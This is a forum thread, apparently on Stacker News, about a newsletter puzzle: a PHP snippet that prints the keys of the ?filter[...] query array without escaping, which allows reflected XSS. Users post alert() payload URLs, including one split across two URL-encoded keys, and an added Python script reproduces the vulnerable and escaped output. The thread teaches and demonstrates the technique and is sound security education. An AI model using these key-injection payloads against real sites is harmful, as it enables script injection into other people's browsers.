
I am subscribed to the Intigriti newsletter and I was about to unsubscribe but then I saw that they included this section:

Hacking Time: Can you spot the XSS vulnerability?

XSS might be easy to find, or not.... Can you seem to spot the cross-site scripting (XSS) vulnerability in this code snippet?

The exploitation method showcased in this example is commonly overseen by most bug bounty hunters, as they’re not aware of the possibility to pass your malicious XSS payload in this different format!

2.5k sats for the first correct answer!

2,500 sats paid 2 times
2554 sats \ 14 replies \ @carter 15 Mar

You can write a script tag into the page with a specially crafted filter?

https://example.com/index.php?filter[<script>alert('Hacked')</script>]=value

0 sats \ 1 reply \ @ek OP 3 Apr

I don't know if you looked up the solution, but you were the first one who posted the exploit code, so I'll also pay you next to #914079

100 sats \ 0 replies \ @carter 3 Apr

I did look up the documentation for the PHP functions and was testing if it actually was the hack with a wasm PHP thing, so I appreciate it. I did feel dumb when they pointed out that the tweet had the answer, when I even signed up for the blog to try and see if the answer was there.


https://example.com/index.php?filter[category%3Cscript%3Ealert%28%27Ha]=value&filter[cked%27%29%3C%2Fscript%3E]=val

You can also break it up into multiple categories and URL-encode, because $_GET handles that. This would look normal to the user in the UI, rendering as: You're currently filtering by "category"

I still don't know what they wouldn't see.

0 sats \ 0 replies \ @sox 16 Mar

Yeah that 'oversee' part threw me off but it's the first thing you see ^^




if that's so then @WeAreAllSatoshi got it right. But I agree with @ek, this is not something that would be missed by most bug hunters 😂

100 sats \ 4 replies \ @ek OP 3 Apr

lol that was indeed the case

but maybe the hard part was to actually exploit it, not just see that it could be exploited


I'd have paid the bounty to @WeAreAllSatoshi myself if you hadn't. Thanks for being cool and paying it out twice.


@ek and I are buds, he wouldn't do me like that

100 sats \ 1 reply \ @optimism 3 Apr

In that case thanks for being cool to @carter


Agree. @ek's cool, he wouldn't do that to anyone.

My previous comment makes it sound like @ek and I were in on it together, which was definitely not the case. We've just developed a rapport over time here on SN.

damn, can't access, returns 429 Too Many Requests currently


I was gonna ask if the answer was already given... It did get me to sign up for that newsletter. My tin foil hat assumed this post is an ad.


Rendering the filter query inside of HTML markup without it being sanitized is my guess. All user input is evil.

100 sats \ 1 reply \ @ek OP 15 Mar

Yes but it doesn’t sound like this should be missed by most bug hunters 🤔

The exploitation method showcased in this example is commonly overseen by most bug bounty hunters, as they’re not aware of the possibility to pass your malicious XSS payload in this different format!

Agree, it’s just the first thing that I saw


Maybe it has a really hard time talking about its feelings?

100 sats \ 4 replies \ @ek OP 3 Apr

@remindme in 1 day to pay out the bounty

paid the bounty to #914079


I wonder if you will still get reminded about this, because I don't think strikethroughs cancel it out?

100 sats \ 1 reply \ @ek OP 3 Apr

Yeah, I probably will, but maybe the mention regexp on the server didn't register the mention because of the ~ in front and deleted the reminder. Let's see lol


Yeah, I don't recall. Maybe it followed a word boundary, so it did cancel it. Keep me posted lol


Hey thanks!


An IMG source with an external URL can return something nasty like an SVG.


The other option I see would be a maliciously entered product entry with a bad name that could result in XSS when rendered, but that also implies compromise of your product management API.


```php
// The keys of $product_filter (the ?filter[...] array from the query string)
// are concatenated straight into the markup; nothing is passed through
// htmlspecialchars(), so a key containing markup is rendered as HTML.
echo "
<p>
You're currently filtering by \"" . implode(", ", array_keys($product_filter)) . "\"
</p>
";
```

That code part gives a malicious user the opportunity to inject JavaScript code into the filter parameter (e.g., via a URL query string like ?filter=<script>alert('XSS')</script>); it would be executed in the browser because the input is not sanitized or escaped.

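Added example, not from the newsletter or from anyone in this thread: a Python emulation of what the PHP snippet above does with the query string, so the key-based injection (the single-key payload from @carter's first reply and the split-across-two-keys variant from the second one) can be reproduced offline. It assumes, as the thread does, that $product_filter is $_GET['filter']; the bracket parser is a one-level approximation of PHP's $_GET handling (no nested brackets, numeric sub-keys kept as strings), and the hardened renderer stands in for wrapping the joined keys in htmlspecialchars().

```python
"""Emulate the reflected ?filter[...] keys of the PHP snippet (added example)."""
import html
from urllib.parse import parse_qsl


def parse_php_get(query: str) -> dict:
    """One-level approximation of PHP's $_GET bracket notation.

    'filter[category]=v'  -> {'filter': {'category': 'v'}}
    'filter[]=1&filter[]=2' -> {'filter': {0: '1', 1: '2'}}
    'q=x'                 -> {'q': 'x'}
    parse_qsl already percent-decodes keys and values, like PHP does,
    so '%3Cscript%3E' inside the brackets arrives as '<script>'.
    """
    result: dict = {}
    for raw_key, value in parse_qsl(query, keep_blank_values=True):
        idx = raw_key.find("[")
        if idx == -1:
            result[raw_key] = value
            continue
        base, sub = raw_key[:idx], raw_key[idx + 1:]
        if sub.endswith("]"):
            sub = sub[:-1]
        container = result.get(base)
        if not isinstance(container, dict):  # PHP turns 'filter=1&filter[a]=2' into an array
            container = {}
            result[base] = container
        if sub == "":  # 'filter[]=...' appends at max numeric index + 1
            numeric = [k for k in container if isinstance(k, int)]
            sub = (max(numeric) + 1) if numeric else 0
        container[sub] = value
    return result


def render_vulnerable(product_filter: dict) -> str:
    """Same construction as the PHP: implode(", ", array_keys($product_filter)) unescaped."""
    keys = ", ".join(str(k) for k in product_filter)
    return "<p>You're currently filtering by \"" + keys + "\"</p>"


def render_hardened(product_filter: dict) -> str:
    """Hardened form: htmlspecialchars()-style escaping of the joined keys before output."""
    keys = ", ".join(str(k) for k in product_filter)
    return "<p>You're currently filtering by \"" + html.escape(keys, quote=True) + "\"</p>"


def demo(query: str) -> tuple:
    """Return (vulnerable markup, hardened markup) for a raw query string."""
    product_filter = parse_php_get(query).get("filter", {})
    return render_vulnerable(product_filter), render_hardened(product_filter)


if __name__ == "__main__":
    # Constructed payloads: the single-key payload and the split one reassembled by ", ".
    for q in (
        "filter[<script>alert('Hacked')</script>]=value",
        "filter[category%3Cscript%3Ealert%28%27Ha]=value&filter[cked%27%29%3C%2Fscript%3E]=val",
    ):
        vulnerable, hardened = demo(q)
        print("vulnerable:", vulnerable)
        print("hardened:  ", hardened)
```

The second payload only works because the keys are joined with ", ": the two fragments come back out as alert('Ha, cked'), which is still valid JavaScript. The hardened renderer leaves the same text in the page but as &lt;script&gt;, so the browser never sees an element.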

If you make an array querystring instead of a dict, you can control the indexes of the array: http://example.com?filter[]=1&filter[]=2&filter[]=3
